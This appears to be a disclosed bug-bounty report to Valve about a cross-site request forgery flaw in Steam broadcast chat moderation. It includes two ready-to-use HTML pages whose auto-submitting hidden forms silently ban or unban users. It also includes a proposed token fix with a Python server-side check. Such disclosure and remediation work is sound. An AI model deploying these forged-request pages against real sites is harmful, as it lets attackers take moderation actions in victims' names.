severity_rating: low
created_at: 2018-07-13 12:28:25
vendor: valve https://hackerone.com/valve
bounty_amount: $500

Steps to reproduce

<iframe style="display:none" name="csrf-frame"></iframe>
<form action="https://steamcommunity.com/broadcast/ajaxupdateusermute/" method="POST" target="csrf-frame" id="csrf-form">
<input type="hidden" name="broadcaststeamid" value="{STEAM ID}">
<input type="hidden" name="issuersteamid" value="{STEAM ID}">
<input type="hidden" name="chattersteamid" value="{USER'S STEAM ID TO UNBAN}">
<input type="hidden" name="bantype" value="0">
<input type="hidden" name="duration" value="0">
<input type="hidden" name="perm" value="0">
</form>
<script>document.getElementById("csrf-form").submit()</script>
<html>
<head>
    <title>Unban in chat - CSRF</title>
</head>

<body>
<h1>Somebody was unbanned silently :/</h1>
</body>
</html>
<iframe style="display:none" name="csrf-frame"></iframe>
<form action="https://steamcommunity.com/broadcast/ajaxupdateusermute/" method="POST" target="csrf-frame" id="csrf-form">
<input type="hidden" name="broadcaststeamid" value="{STEAM ID}">
<input type="hidden" name="issuersteamid" value="{STEAM ID}">
<input type="hidden" name="chattersteamid" value="{USER'S STEAM ID TO BAN}">
<input type="hidden" name="bantype" value="1">
<input type="hidden" name="duration" value="0">
<input type="hidden" name="perm" value="1">
</form>
<script>document.getElementById("csrf-form").submit()</script>
<html>
<head>
    <title>Ban in chat - CSRF</title>
</head>

<body>
<h1>Somebody was banned silently :/</h1>
</body>
</html>

Video PoC

*I banned myself, because I don't have a third Steam account

Fix

Add a sessionid parameter to the POST request, as is already implemented in other requests.
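
One way the server-side check behind this fix could look, as an added example (not Valve's code and not part of the original report). The session store, the `login` cookie name, the token format and the Steam IDs are hypothetical; only the form field names come from the report.

```python
import hmac
import secrets

# Hypothetical server-side store: login cookie value -> session state.
SESSIONS = {}

def new_session(steamid):
    """Log a user in; return (login cookie, per-session anti-CSRF token)."""
    cookie = secrets.token_urlsafe(32)
    token = secrets.token_hex(12)
    SESSIONS[cookie] = {"steamid": steamid, "sessionid": token}
    return cookie, token

def handle_update_user_mute(cookies, form):
    """Decide whether a POST to the ban/unban endpoint may proceed."""
    session = SESSIONS.get(cookies.get("login", ""))
    if session is None:
        return 401, "not logged in"
    # The browser attaches the login cookie to a cross-site form post on its
    # own, but a third-party page cannot read the token to place it in the body.
    supplied = form.get("sessionid", "")
    expected = session["sessionid"]
    # Compare as bytes: constant-time, and non-ASCII input cannot raise TypeError.
    if not supplied or not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "missing or invalid sessionid"
    return 200, "mute state updated"

# Constructed request body carrying the fields of the report's ban form.
# It has no sessionid, which is what a cross-site form submission looks like.
FORGED_FORM = {
    "broadcaststeamid": "76561190000000001",  # constructed placeholder IDs
    "issuersteamid": "76561190000000001",
    "chattersteamid": "76561190000000002",
    "bantype": "1",
    "duration": "0",
    "perm": "1",
}

def demo():
    """Return the (forged, legitimate) outcomes for one logged-in moderator."""
    cookie, token = new_session("76561190000000001")
    cookies = {"login": cookie}
    forged = handle_update_user_mute(cookies, FORGED_FORM)
    legit = handle_update_user_mute(cookies, {**FORGED_FORM, "sessionid": token})
    return forged, legit

if __name__ == "__main__":
    print(demo())
```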

Impact

An attacker can permanently ban or unban other users.
